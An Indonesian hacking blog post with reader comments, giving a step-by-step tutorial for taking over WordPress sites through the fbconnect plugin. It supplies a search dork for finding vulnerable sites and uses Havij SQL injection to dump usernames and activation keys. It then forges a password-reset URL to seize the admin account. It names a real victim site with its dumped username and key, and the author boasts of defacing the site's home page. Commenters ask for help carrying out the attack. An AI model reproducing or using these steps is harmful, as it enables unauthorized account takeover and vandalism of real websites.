Hai guy's,setelah sekian lama blog ini gak keurus dikarenakan banyak hal di dunia nyata yang memaksa saya harus meninggalkannya untuk sesaat maka di kesempatan ini saya tuliskan sebuah tutor yang mungkin sedikit banyak berguna bagi para penggiat komputer yang hobi pentest web. ( walah bahasanya formil amat )
Kali ini saya menulis tentang keamanan di plugin WP,sebenarnya cukup banyak plugin wp yang rentan,tapi saya hanya membahas salah satunya saja.Ok tanpa banyak cingcong langsung aja deh...
peralatan yang dibutuhkan adalah:
- Kompie terhubung internet
- Havij
- dork: inurl:?fbconnect_action=myhome ( kreasi lagi yaa )
- Kesabaran dalam mencari target
- Rokok,Kopi dan musik yang kuenceng ( disarankan alirannya Rock,Metal ) hehehe
saya beri contoh satu korban yaitu http://www.40sale.com/?fbconnect_action=myhome&userid=14 pada bagian "userid=" di tambahin tulisan " fb" jadi bentuknya seperti ini http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14
kalau udah scan dengan Havij dan cari tabel wp_user atau yang berhubungan dengan user lah,kalau udah ketemu cari column user_login dan user_activation_key
heheh...dah ketemu tuh yang kita cari,
username:pico
Activation key: GBasuGIZFtbUjpP3MvWb
sekarang kita gunakan exploitnya yaitu
wp-login.php?action=rp&key="kode aktivasi"&login="user login"
jadi alamatnya tadi dirubah seperti ini http://www.40sale.com/wp-login.php?action=rp&key=GBasuGIZFtbUjpP3MvWb&login=pico
sampailah kita ke tahap me-reset password korban heheh,kalau udah direset kita tinggal login dan melakukan sekehendak kita
saya cukup ngedit home.php nya aja dah,hehehe
buseeeet hasilnya kelam banget dah...sory ya min
pesan saya Don't Be Evil
6 comments
mas, saya udah coba tutor diatas, kendala saya, waktu bagian reset pass saat kode aktivasi dan username di input maka akan langsung keluar
PASWORD TELAH DIRESET, CEK EMAIL ANDA.
Bagaimana saya bisa ambil pasword, sedangkan emailnya masih email pemilik akun YBS??
harap bantuannya, cukup kirim email ke the_rickey@yahoo.co.id
bagaimana mau lihat key itu ?
saya sudah dpt key dan username nya gan.,.,
tp gimana cara ngereset passwornya secara detail?
karena saya masukkan ke google not found jdnya.,.,
please blz ke email informatika73@ymail.com
Kok Activation Key Gw Gk Ketemu Bro ??
Ni buat WP versi brp bro?
disitu WP 3.5.1
Post a Comment